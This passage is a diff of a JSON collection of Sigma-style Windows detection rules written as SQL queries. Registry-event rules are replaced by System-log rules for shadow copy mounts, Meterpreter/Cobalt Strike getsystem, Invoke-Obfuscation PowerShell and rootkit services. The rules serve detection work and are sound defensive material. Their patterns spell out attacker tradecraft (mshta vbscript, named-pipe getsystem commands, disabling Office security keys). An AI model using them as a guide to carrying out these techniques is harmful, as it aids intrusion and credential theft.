"title": "Volume Shadow Copy Mount", + "id": "f512acbf-e662-4903-843e-97ce4652b740", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects volume shadow copy mount via windows event log", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of volume shadow copy mounts (backups maybe)." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_volume_shadow_copy_mount.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", - "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "status": "test", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - 
"Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "Windows Update Error", + "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", + "description": "Windows Update get some error Check if need a 0-days KB", "author": "frack113", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.resource_development", + "attack.t1584" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_system_update_error.yml" }, { - "title": "Modification of IE Registry Settings", - "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. 
An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", - "author": "frack113", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((NewValue LIKE 'DWORD%' ESCAPE '\\') OR (NewValue IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (NewValue = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_set_persistence_ie.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], 
"falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.persistence", - "attack.t1547.008" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - 
"level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND 
ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE 
'\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml" + }, + { + "title": "New PDQDeploy Service - Server Side", + "id": 
"ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "falsepositives": [ + "Legitimate use of the tool" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + 
"description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1027", + 
"attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Windows Defender Threat Detection Disabled - Service", + "id": "6c0a7755-6d31-44fa-80e1-133e57752680", + "status": "stable", + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions", + "Auto updates of Windows Defender causes restarts" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject 
LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_defender_disabled.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": 
"Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": 